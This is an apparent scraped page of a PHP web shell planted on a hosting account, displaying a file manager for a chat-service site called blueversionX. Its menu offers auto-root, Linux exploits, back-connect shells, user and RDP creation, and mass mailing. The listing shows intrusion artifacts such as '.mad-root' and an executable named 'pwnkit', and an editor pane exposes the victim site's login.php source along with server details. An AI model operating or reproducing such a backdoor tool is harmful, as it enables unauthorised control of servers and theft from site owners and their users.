Linux webm002.cluster120.gra.hosting.ovh.net 6.18.42-ovh-vps-grsec-zfs+ #1 SMP PREEMPT_DYNAMIC Wed Aug 5 15:59:48 CEST 2026 x86_64
Apache
: 10.120.20.2 | : 216.73.216.49
Cant Read [ /etc/named.conf ]
8.5.7
verseaumee
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
home /
verseaumee /
chatblueversion /
[ HOME SHELL ]
Name
Size
Permission
Action
760093
[ DIR ]
drwxr-xr-x
admin
[ DIR ]
drwx---r-x
api
[ DIR ]
drwx---r-x
assets
[ DIR ]
drwx---r-x
auth
[ DIR ]
drwx---r-x
includes
[ DIR ]
drwx---r-x
install
[ DIR ]
drwx---r-x
payment
[ DIR ]
drwx---r-x
storage
[ DIR ]
drwx---r-x
.htaccess
181
B
-rw----r--
.mad-root
0
B
-rw-r--r--
README.txt
1.94
KB
-rw----r--
account.php
3.2
KB
-rw----r--
adminer.php
0
B
-rw-r--r--
config.example.php
475
B
-rw----r--
config.php
1.04
KB
-rw-r--r--
favicon.ico
31.29
KB
-rw----r--
favicon.svg
712
B
-rw----r--
index.php
5
KB
-rw----r--
login.php
1.38
KB
-rw----r--
logout.php
71
B
-rw----r--
plans.php
1.81
KB
-rw----r--
pwnkit
0
B
-rwxr-xr-x
register.php
2.25
KB
-rw----r--
worksec.php
1.06
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : login.php
<?php require __DIR__.'/includes/bootstrap.php';$error='';if($_SERVER['REQUEST_METHOD']==='POST'){$s=$pdo->prepare('SELECT * FROM users WHERE email=? AND status="active"');$s->execute([strtolower(trim($_POST['email']))]);$u=$s->fetch();if($u&&$u['password_hash']&&password_verify($_POST['password'],$u['password_hash'])){$_SESSION['user']=['id'=>$u['id'],'email'=>$u['email'],'name'=>$u['name'],'role'=>$u['role'],'plan'=>$u['plan']];header('Location: index.php');exit;}$error='Invalid email or password.';}?><!doctype html><html><head><meta charset="utf-8"><meta name="viewport" content="width=device-width"><title>Sign in ยท blueversionX</title><link rel="icon" href="favicon.svg"><link rel="stylesheet" href="assets/style.css"></head><body><div class="authShell"><main class="authCard"><img class="logo" src="assets/blueversionx-logo.svg" alt="blueversionX"><h1>Welcome to blueversionX</h1><p>Sign in to continue your conversations.</p><?php if($error):?><p class="error"><?=htmlspecialchars($error)?></p><?php endif?><form method="post"><label>Email<input type="email" name="email" required></label><label>Password<input type="password" name="password" required></label><button>Sign in</button><a class="google" href="auth/google.php">G Continue with Google</a></form><div class="authLinks"><a href="index.php">Back to chat</a><a href="register.php">Create account</a></div></main></div></body></html>
Close